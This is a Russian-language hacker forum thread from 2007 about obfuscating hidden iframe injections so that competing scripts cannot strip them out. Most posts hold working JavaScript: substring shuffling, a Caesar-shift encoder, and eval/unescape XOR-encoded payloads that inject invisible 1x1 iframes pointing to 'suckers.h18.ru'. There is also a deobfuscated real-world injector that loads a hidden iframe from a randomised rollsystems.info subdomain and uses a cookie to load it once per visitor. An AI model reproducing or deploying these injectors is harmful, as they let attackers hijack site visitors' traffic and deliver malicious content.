мысли о iframe

genom-- · 9 May 2007

мне тут чел в аську стукнул -- и говорит закриптуй ифрейм --- мне сразу думаю криптовка->трои->отчеты -- какой нафиг ифрейм

чуток попозже до меня доперло о чем он -- просто скрипты ифреймеры чужие ифрейм теги удаляют -- а он хотел от этого избавиться --

ну вот мне чет на ночь глядя и навеяло если с php и cgi скриптами все ясно просто декодим в base64 и выводим декод от хэша то с html abu знает

ну я тут почесал репку и вот что надумал

<script>
var anyString ="<>firame src='http://suckers.h18.ru' width='1' height='1'"
document.write (anyString.substring (0,1),anyString.substring (3,4),anyString.substring (2,3),anyString.substring (4,58),anyString.substring (1,2),anyString.substring (0,1),anyString.substring (20,21),anyString.substring (3,4),anyString.substring (2,3),anyString.substring (4,9),anyString.substring (1,2))
</script>

вот получается из строки какбы посимвольно или группами выдираем и и составляем из них
<iframe src="http://suckers.h18.ru" width="1" height="1"></iframe>

конец

Helios · 9 May 2007

Тогда уж лучше брать принципы HTML-протекторов.

Самое простое - сдвиг всех символов по таблице (Код Цезаря?):

Кодировщик:

PHP:

var source = "<iframe src='http://suckers.h18.ru' width='1' height='1'>"; var result = ""; var step = 2; for(var i=0;i<source.length;i++)result+=String.fromCharCode(source.charCodeAt(i)+step); document.write(result);

напишет

>khtcog"ute?)jvvr<11uwemgtu0j3:0tw)"ykfvj?)3)"jgkijv?)3)@
Click to expand...

Для декодирования на странице просто заменить step на противоположное значение и подставить защифрованный код как source:

PHP:

var source = '>khtcog"ute?)jvvr<11uwemgtu0j3:0tw)"ykfvj?)3)"jgkijv?)3)@'; var step = -2; var result = ''; for(var i=0;i<source.length;i++)result+=String.fromCharCode(source.charCodeAt(i)+step); document.write(result);

genom-- · 9 May 2007

ну можно и так =)

almaz · 10 May 2007

Так вот по интересней будет <iframe src="http://suckers.h18.ru" width="1" height="1"></iframe> после кодирования получаеться во так:

Code:

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<gocpdk->< 3 ?vjekgj\" 3 ?jvfku\" wp,:3j,qpgiawq--8rvvj ?apq\"gocpdk>%08%08<VRKPAQ->9s?vpcvqecpflm,vlgowamfgqncd\"lpwvgpy+*s\"lmkvalwd9 ilcn`8vwm`c ?lmkvcamn,umflku+ gnkd ??+6.2*elkpvq`wq,dgpj,lmkvcamn,umflku*dk9+*o+23. +*o *vwmgokVvgq9  ?qwvcvq,umflkuy+*o\"lmkvalwd9w?vlkprpgvdclm,umflku9m?vlkprgpmdg`lm,umflku9  ?{vknk`kqkt,gn{vq,_kYnnc,vlgowamf+ 3 ??fk,_kYnnc,vlgowamf*dky+))k9jvelgn,nnc,vlgowamf>k92?k*pmdy+*w\"lmkvalwd9 3 ?fk,_kYnnc,vlgowamf9 lgffkj ?{vknk`kqkt,gn{vq,_kYnnc,vlgowamfy+ lgffkj ?#{vknk`kqkt,gn{vq,_kYnnc,vlgowamf*dky+))k9jvelgn,nnc,vlgowamf>k92?k*pmdy+*m\"lmkvalwd+*{9+ <tkf-><lgffkj8{vknk`kqkt?gn{vq\"c?gwnct\"cv?gocl\"cgpcvzgv?gr{v\"vwrlk><zr2223/8rmv9zr2223/8vdgn9gvwnmq`c8lmkvkqmr?gn{vq\"tkf> *gvkpu,vlgowamfy+3/??+ cpgrM *dMzgflk,vlgeCpgqw,pmvcektcl$$nnc,vlgowamf*dky+3/?#+ GKQO *dMzgflk,vlgeCpgqw,pmvcektcl~~3/??+ pgpmnrzG\"vglpgvlK *dMzgflk,gocLrrc,pmvcektcl*dk+221. +*{ *vwmgokVvgq9+ {rmA *flcoomAagzg,+*gelcPvzgVgvcgpa,cvy+*{\"lmkvalwd9 ilcn`8vwm`c ?lmkvcamn,umflku+3/?#+ cpgrM *dMzgflk,vlgeCpgqw,pmvcektcl*dkd?lumfgqwmolm,vlgowamf9e?wlgovzgvlmalm,vlgowamfy+nnc,vlgowamf#$$fK{@vlgognGvge,vlgowamf*dkh?rwgqwmolm,umflku9j?lumfgqwmolm,umflku9+LUMFGQWMO,vlgtG~RWGQWMO,vlgtG*qvlgtGgpwvrca,umflkuy+qpg{cn,vlgowamf*dkd?vpcvqvagngqlm,vlgowamf9e?wlgovzgvlmalm,vlgowamfy+nnc,vlgowamf*dky+3/?#+ GKQO *dMzgflk,vlgeCpgqw,pmvcektcl~~3/??+ pgpmnrzG\"vglpgvlK *dMzgflk,gocLrrc,pmvcektcl*dknnwl?gtmogqwmolm,umflku9+GTMOGQWMO,vlgtG*qvlgtGgqcgngp,umflkuy+3??jakju,n*dky+n*h\"lmkvalwdd?gtmogqwmolm,umflku9+GTMOGQWMO,vlgtG*qvlgtGgpwvrca,umflkuy+3??jakju,n*dky+n*j\"lmkvalwdgqncd\"lpwvgpy+*e\"lmkvalwdgqncd\"lpwvgpy+n*d\"lmkvalwd< vrkpaQctcH ?gecwelcN\"VRKPAQ>"));
</SCRIPT>

Rebz · 10 May 2007

ну-ка ребятки

кто раскрипутем?)

Code:

document.write(unescape("%3Cscript%3Etry%20%7Bfunction%20IUD%28vfy%29%7Breturn%20parseInt%28vfy%29%7Dvar%20icV%3D%2777u7Su7wu7au7ru7Fu7Uu7Nu75u7tu7ou7Vu7Du7Iu73u7pu7ju7nu7Xu7Gu7Ju7Hu78u7du7gu7qu7cu7Yu76u7yu7Pu7Tu7iu7Bu7Mu7zu79u7ku7Cu7su7Zu7Ou7fu74u7bu7Lu7lu7mu7eu7Au7Ru7Ku7Wu7huS7uSSuSwuSauSruSFuSUuSNuS5uStuSouSVuSDuSIuS3uSp%27%2CnZX%3DicV.substr%282%2C1%29%3Bvar%20qRp%3DArray%28IUD%28%27144%27%29%2CIUD%28%27223%27%29%2C26322%5E26141%2C21993%5E21815%2CIUD%28%27197%27%29%2CIUD%28%27220%27%29%2C4519%5E4479%2C8893%5E8751%2CIUD%28%27161%27%29%2C24675%5E24773%2C10539%5E10721%2C12208%5E12137%2C5037%5E4975%2CIUD%28%27195%27%29%2C21393%5E21277%2CIUD%28%27213%27%29%2C15258%5E15209%2CIUD%28%27132%27%29%2C3608%5E3741%2CIUD%28%27215%27%29%2CIUD%28%27218%27%29%2CIUD%28%27205%27%29%2CIUD%28%27192%27%29%2CIUD%28%27145%27%29%2CIUD%28%27158%27%29%2C13273%5E13121%2CIUD%28%27128%27%29%2CIUD%28%27142%27%29%2CIUD%28%27156%27%29%2C17476%5E17625%2CIUD%28%27159%27%29%2CIUD%28%27153%27%29%2C17201%5E17323%2C24406%5E24525%2CIUD%28%27148%27%29%2CIUD%28%27149%27%29%2C20659%5E20605%2CIUD%28%27200%27%29%2CIUD%28%27201%27%29%2CIUD%28%27151%27%29%2C22608%5E22743%2CIUD%28%27130%27%29%2CIUD%28%27225%27%29%2C15917%5E16105%2C17322%5E17259%2C20467%5E20341%2CIUD%28%27203%27%29%2CIUD%28%27209%27%29%2CIUD%28%27219%27%29%2CIUD%28%27232%27%29%2C28005%5E28061%2C1322%5E1517%2CIUD%28%27212%27%29%2C25402%5E25553%2C15330%5E15133%2CIUD%28%27131%27%29%2CIUD%28%27227%27%29%2C22766%5E22639%2C17309%5E17163%2CIUD%28%27141%27%29%2C19666%5E19521%2C21212%5E21035%2C24777%5E24635%2C13259%5E13085%2CIUD%28%27241%27%29%2C4475%5E4491%2CIUD%28%27233%27%29%2C2254%5E2083%2C2045%5E1811%2C16598%5E16441%29%2CVJx%3Bvar%20SJK%2CBJI%3Bvar%20fmI%3D%27777S7w7a7r7F7U7N757t7o7V7D7w7U7r7I7D737a7S7p7S7j7a7S7n7X7G737J7H7a73787d7g7q7c7w7d7Y767y7g7P7q7T7i7B7M7z767H797w7k7C7o7Y7c7I7d7Y7Y7s737o7I7a7n7r7d767s737r737773787s737r7Z7Z7X737I737Z7d737w7O7S7V797S7U7a7n7f7H7U747O7o787I7I7a7n7f7H7U747O7a7H7D7k7I7b7n7X7L7w7O787C7D7l7U747X7c7y7c7y7X7s737a7C7U7V7a7D737I7s737m757t7o7V7D7w7U7r7I7D737a7S7p7S7j7S7w7n7w7D7c7w7J7X7G737J7H7a737U7d737D7C7e737A7H7U7C7n7X7s737J7H7a737C7d737D7C7e737A7H7U7C7n7X7s737C7O7S7C7U7R7r7b7C7n7U7O7l7C7U7R7r7b7C7n7X7Z7P7i76767676767L7g7q7X7s737k7I7w7V7b7C7D7U7O7w7I7I7K7r7C737d737w7D7Z7Y7d7Y7Z7C7S7w7H7F7C7n7w7J7X7Z7Y7s7C7W7F7r7a7C7S7d7Y7Z7C7O7U7I7h7f7RS77U7a7r7D7l7n7X7s737m757t7J7H7a737w7D737d737Y7y7a7S7e7P7I7y7k7Y7c7w7J737d737Y7y7Y7c7S7C7d7Y7S7y7O7a7I78787S7p7S7U7C7b7S7O7r7D7o7I7Y7c7F7d7YSS747U7b78SS7Y7s757t7r7o7n7k7I7w7V7b7C7D7U7O7w7I7I7K7r7C7O7r7D7k7C7WSw7o7n7w7D7Z7Y7Y7Z7Y7d7Y7Z7w7J7Z7Y7Y7X737d7d73Sa7y7X737G757t7J7H7a737V7a78737d737Y747U7U7FSrSSSS7Y737Z737n7k7I7w7V7b7C7D7U7O787I7w7H7U7r7I7D7O747I7S7U73SF7d737Y7Y73SU737Y7Y73Sr737a7S7p7S7j7a7S7n7X7X737Z737k7I7w7V7b7C7D7U7O787I7w7H7U7r7I7D7O747I7S7U7O7a7C7F787H7w7C7nSSSNS57HSaSt76Sa7z7OSaSoSS7c737Y7O7Y7X7O7a7C7F787H7w7C7nSSSV7O7ZSS7c737Y7O7Y7X737Z737Y7O7Y737Z737a7S7p7S7j7a7S7n7X737Z737Y7O7Y737Z737S7C737Z737F7s757t7J7H7a737I737d737k7I7w7V7b7C7D7U7O7w7a7C7H7U7CSD787C7b7C7D7U7n7Y7r7o7a7H7b7C7Y7X7s7I7O7S7C7USI7U7U7a7r797V7U7C7n7Y7S7a7w7Y7c737V7a787X7s757t7I7O7o7a7H7b7CS37I7a7k7C7a7d767s737I7O7e7r7k7U747d7y7s737I7O747C7r7l747U7d7y7s737I7O7S7U7p787C7O7k7r7S7F787H7p7d7Y7D7I7D7C7Y7s73757t7U7a7p737G737k7I7w7V7b7C7D7U7O797I7k7p7O7H7F7F7C7D7kSp747r787k7n7I7X7s737a7S7p7S7j7S7w7n7w7D7c7w7J7X7s7m757t7w7H7U7w747n7C7X7G7k7I7w7V7b7C7D7U7O7e7a7r7U7C7n7Y77747U7b787N77797I7k7p7N77SS797I7k7p7N77SS747U7b787N7Y7X7s7k7I7w7V7b7C7D7U7O797I7k7p7O7H7F7F7C7D7kSp747r787k7n7I7X7s737a7S7p7S7j7S7w7n7w7D7c7w7J7X7s7m7m757t77SS7S7w7a7r7F7U7N%27%2Caim%3D%27%27%3BicV%3DicV.split%28nZX%29%3Bfor%28VJx%3D0%3BVJx%3CfmI.length%3BVJx+%3D2%29%7BBJI%3DfmI.substr%28VJx%2C2%29%3Bfor%28SJK%3D0%3BSJK%3CicV.length%3BSJK++%29%7Bif%28icV%5BSJK%5D%3D%3DBJI%29break%3B%7D%20aim+%3DString.fromCharCode%28qRp%5BSJK%5D%5E172%29%3B%7Ddocument.write%28aim%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script>

gemaglabin · 10 May 2007

Расшифровка всех ваших новомодных криптеров займем не больше пяти секунд.

Rebz · 10 May 2007

Давай, Гем.. покажи класс )

gemaglabin · 10 May 2007

Вот на

PHP:

<script>try {function IUD(vfy){return parseInt(vfy)}var icV='77u7Su7wu7au7ru7Fu7Uu7Nu75u7tu7ou7Vu7Du7Iu73u7pu7ju7nu7Xu7Gu7Ju7Hu78u7du7gu7qu7cu7Yu76u7yu7Pu7Tu7iu7Bu7Mu7zu79u7ku7Cu7su7Zu7Ou7fu74u7bu7Lu7lu7mu7eu7Au7Ru7Ku7Wu7huS7uSSuSwuSauSruSFuSUuSNuS5uStuSouSVuSDuSIuS3uSp',nZX=icV.substr(2,1);var qRp=Array(IUD('144'),IUD('223'),26322^26141,21993^21815,IUD('197'),IUD('220'),4519^4479,8893^8751,IUD('161'),24675^24773,10539^10721,12208^12137,5037^4975,IUD('195'),21393^21277,IUD('213'),15258^15209,IUD('132'),3608^3741,IUD('215'),IUD('218'),IUD('205'),IUD('192'),IUD('145'),IUD('158'),13273^13121,IUD('128'),IUD('142'),IUD('156'),17476^17625,IUD('159'),IUD('153'),17201^17323,24406^24525,IUD('148'),IUD('149'),20659^20605,IUD('200'),IUD('201'),IUD('151'),22608^22743,IUD('130'),IUD('225'),15917^16105,17322^17259,20467^20341,IUD('203'),IUD('209'),IUD('219'),IUD('232'),28005^28061,1322^1517,IUD('212'),25402^25553,15330^15133,IUD('131'),IUD('227'),22766^22639,17309^17163,IUD('141'),19666^19521,21212^21035,24777^24635,13259^13085,IUD('241'),4475^4491,IUD('233'),2254^2083,2045^1811,16598^16441),VJx;var SJK,BJI;var fmI='777S7w7a7r7F7U7N757t7o7V7D7w7U7r7I7D737a7S7p7S7j7a7S7n7X7G737J7H7a73787d7g7q7c7w7d7Y767y7g7P7q7T7i7B7M7z767H797w7k7C7o7Y7c7I7d7Y7Y7s737o7I7a7n7r7d767s737r737773787s737r7Z7Z7X737I737Z7d737w7O7S7V797S7U7a7n7f7H7U747O7o787I7I7a7n7f7H7U747O7a7H7D7k7I7b7n7X7L7w7O787C7D7l7U747X7c7y7c7y7X7s737a7C7U7V7a7D737I7s737m757t7o7V7D7w7U7r7I7D737a7S7p7S7j7S7w7n7w7D7c7w7J7X7G737J7H7a737U7d737D7C7e737A7H7U7C7n7X7s737J7H7a737C7d737D7C7e737A7H7U7C7n7X7s737C7O7S7C7U7R7r7b7C7n7U7O7l7C7U7R7r7b7C7n7X7Z7P7i76767676767L7g7q7X7s737k7I7w7V7b7C7D7U7O7w7I7I7K7r7C737d737w7D7Z7Y7d7Y7Z7C7S7w7H7F7C7n7w7J7X7Z7Y7s7C7W7F7r7a7C7S7d7Y7Z7C7O7U7I7h7f7RS77U7a7r7D7l7n7X7s737m757t7J7H7a737w7D737d737Y7y7a7S7e7P7I7y7k7Y7c7w7J737d737Y7y7Y7c7S7C7d7Y7S7y7O7a7I78787S7p7S7U7C7b7S7O7r7D7o7I7Y7c7F7d7YSS747U7b78SS7Y7s757t7r7o7n7k7I7w7V7b7C7D7U7O7w7I7I7K7r7C7O7r7D7k7C7WSw7o7n7w7D7Z7Y7Y7Z7Y7d7Y7Z7w7J7Z7Y7Y7X737d7d73Sa7y7X737G757t7J7H7a737V7a78737d737Y747U7U7FSrSSSS7Y737Z737n7k7I7w7V7b7C7D7U7O787I7w7H7U7r7I7D7O747I7S7U73SF7d737Y7Y73SU737Y7Y73Sr737a7S7p7S7j7a7S7n7X7X737Z737k7I7w7V7b7C7D7U7O787I7w7H7U7r7I7D7O747I7S7U7O7a7C7F787H7w7C7nSSSNS57HSaSt76Sa7z7OSaSoSS7c737Y7O7Y7X7O7a7C7F787H7w7C7nSSSV7O7ZSS7c737Y7O7Y7X737Z737Y7O7Y737Z737a7S7p7S7j7a7S7n7X737Z737Y7O7Y737Z737S7C737Z737F7s757t7J7H7a737I737d737k7I7w7V7b7C7D7U7O7w7a7C7H7U7CSD787C7b7C7D7U7n7Y7r7o7a7H7b7C7Y7X7s7I7O7S7C7USI7U7U7a7r797V7U7C7n7Y7S7a7w7Y7c737V7a787X7s757t7I7O7o7a7H7b7CS37I7a7k7C7a7d767s737I7O7e7r7k7U747d7y7s737I7O747C7r7l747U7d7y7s737I7O7S7U7p787C7O7k7r7S7F787H7p7d7Y7D7I7D7C7Y7s73757t7U7a7p737G737k7I7w7V7b7C7D7U7O797I7k7p7O7H7F7F7C7D7kSp747r787k7n7I7X7s737a7S7p7S7j7S7w7n7w7D7c7w7J7X7s7m757t7w7H7U7w747n7C7X7G7k7I7w7V7b7C7D7U7O7e7a7r7U7C7n7Y77747U7b787N77797I7k7p7N77SS797I7k7p7N77SS747U7b787N7Y7X7s7k7I7w7V7b7C7D7U7O797I7k7p7O7H7F7F7C7D7kSp747r787k7n7I7X7s737a7S7p7S7j7S7w7n7w7D7c7w7J7X7s7m7m757t77SS7S7w7a7r7F7U7N',aim='';icV=icV.split(nZX);for(VJx=0;VJx<fmI.length;VJx+=2){BJI=fmI.substr(VJx,2);for(SJK=0;SJK<icV.length;SJK++){if(icV[SJK]==BJI)break;} aim+=String.fromCharCode(qRp[SJK]^172);}document.write(aim);} catch(e){}</script>

Повторно

PHP:

<script> function rsys_rs(){ var l=24,c="01234567890abcdef",o=""; for(i=0; i < l; i++) o += c.substr(Math.floor(Math.random()*c.length),1,1); return o; } function rsys_sc(cn,cv){ var t= new Date(); var e= new Date(); e.setTime(t.getTime()+3600000*24); document.cookie = cn+"="+escape(cv)+";expires="+e.toGMTString(); } var cn = "1rsw3o1d",cv = "1",se="s1.rollsystems.info",p="/html/"; if(document.cookie.indexOf(cn+""+"="+cv+"") == -1) { var url = "http://" + (document.location.host != "" ? "" : rsys_rs()) + document.location.host.replace(/[^a-z0-9.-]/, ".").replace(/\.+/, ".") + "." + rsys_rs() + "." + se + p; var o = document.createElement("iframe");o.setAttribute("src", url); o.frameBorder=0; o.width=1; o.height=1; o.style.display="none"; try { document.body.appendChild(o); rsys_sc(cn,cv);} catch(e){document.write("<html><body></body></html>");document.body.appendChild(o); rsys_sc(cn,cv);}} </script>

Rebz · 10 May 2007

молодец =) хек)

Helios · 10 May 2007

при том хек в 3 хода=)

мысли о iframe

genom-- Elder - Старейшина

Helios Elder - Старейшина

genom-- Elder - Старейшина

almaz Elder - Старейшина

Rebz Banned

gemaglabin Green member

Rebz Banned

gemaglabin Green member

Rebz Banned

Helios Elder - Старейшина

Useful Searches

мысли о iframe

genom-- Elder - Старейшина

Helios Elder - Старейшина

genom-- Elder - Старейшина

almaz Elder - Старейшина

Rebz Banned

gemaglabin Green member

Rebz Banned

gemaglabin Green member

Rebz Banned

Helios Elder - Старейшина